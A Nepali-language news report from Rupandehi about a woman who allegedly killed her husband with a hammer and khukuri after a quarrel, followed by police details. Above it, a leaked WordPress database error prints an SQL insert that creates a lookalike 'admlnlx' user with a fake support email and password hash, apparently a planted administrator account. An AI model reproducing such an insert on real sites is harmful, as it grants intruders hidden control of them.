WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ8Jy3xqsKqppbRiwALBvrmeQD/R8a.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:40:13', '', 'admlnlx', 'admlnlx')
रुपन्देही, पुस ११ –
रुपन्देहीको रुद्रपुर-२ पिपरी चापा टोलकी २४ वर्षकी शिला बुढाले हतौडा र खुकुरीले हानेर श्रीमान् २३ वर्षका श्याम बुढाको हत्या गरेकी छिन् । राति १ बजेतिर शिला र श्यामको झगडा हुँदा शिलाले हतौडा र खुकुरीले हानेको स्थानीय बासिन्दाले बताएका छन् । श्यामको शरीरमा चोटैचोट लागेको इलाका प्रहरी कार्यालय रुद्रपुरले जानकारी दिएको छ ।
स्थानीय बासिन्दाले प्रहरीलाई खबर गरेपछि गम्भीर घाइते भएका श्याम बुढालाई राति साढे २ बजे उपचारका लागि लुम्बिनी अञ्चल अस्पताल बुटवल पठाइएको थियो । त्यहाँ उनको उपचारको क्रममा बिहान ज्यान गएको इलाका प्रहरी कार्यालय रुद्धपुरका प्रहरी सहायक निरीक्षक राम बिलास यादवले जानकारी दिनुभयो ।
श्रीमती शिलाको पनि दुबै हातमा गहिरो चोट लागेकाले प्रहरीको नियन्त्रणमा लुम्बिनी अञ्चल अस्पतालमा उपचार भइरहेको छ । घटनाको थप अनुसन्धान भइरहेको प्रहरीको भनाई छ ।